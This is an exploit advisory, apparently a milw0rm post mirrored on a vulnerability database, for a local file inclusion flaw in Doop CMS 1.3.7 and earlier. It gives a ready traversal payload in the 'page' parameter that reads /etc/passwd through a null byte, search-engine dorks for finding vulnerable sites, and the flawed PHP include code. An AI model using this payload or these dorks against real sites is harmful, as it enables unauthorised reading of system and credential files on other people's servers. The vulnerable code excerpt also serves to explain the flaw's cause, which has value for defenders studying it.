doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability

🗓️ 15 Oct 2007 00:00:00Reported by RootType

DOOP CMS <=1.3.7 Local File Inclusion Vulnerability, magic quotes_gpc vulnerabilit


                                                 ______________________________________________________
|         DOOP CMS &lt;=1.3.7 Local File Inclusion        |
|______________________________________________________|

 ______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
|                                                      |
| dork: Doop CMS                                       |
| dork2: powered by Doop CMS                           |
|                                                      |       
| work only if magic_quotes_gpc are set to OFF         |
|______________________________________________________|

 ______________________________________________________
| vuln code:                                           |
| line 544:                                            |
|  if (!isset($_REQUEST['page'])){                     |
|    $_REQUEST['page']=$homepage;                      |
|    $cpage=$_REQUEST['page'];                         |
|  } else { $cpage=$_REQUEST['page']; }                |
|                                                      |
| line 646:                                            |
|  if ($admin == FALSE &amp;&amp; !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
|    if (file_exists(&quot;pages/&quot;.$cpage.&quot;.htm&quot;)){         |
|        include(&quot;pages/&quot;.$cpage.&quot;.htm&quot;);              |
|    }                                                 |
|    else include(&quot;pages/&quot;.$cpage.&quot;.html&quot;);            |
|   }                                                  |
|______________________________________________________|
 ______________________________________________________
| greetz to: http://vladii.wordpress.com               |
|            http://rstzone.org                        |
|            http://hackpedia.info                     |
|            SlicK &amp; Shocker &amp; moubik &amp; kw3            |
|______________________________________________________|

 ______________________________________________________
|                  @vladii 2007                        |
|______________________________________________________| 

# milw0rm.com [2007-10-15]

15 Oct 2007 00:00Current

7.1High risk

Vulners AI Score7.1

doop CMS &lt;= 1.3.7 (page) Local File Inclusion Vulnerability

doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability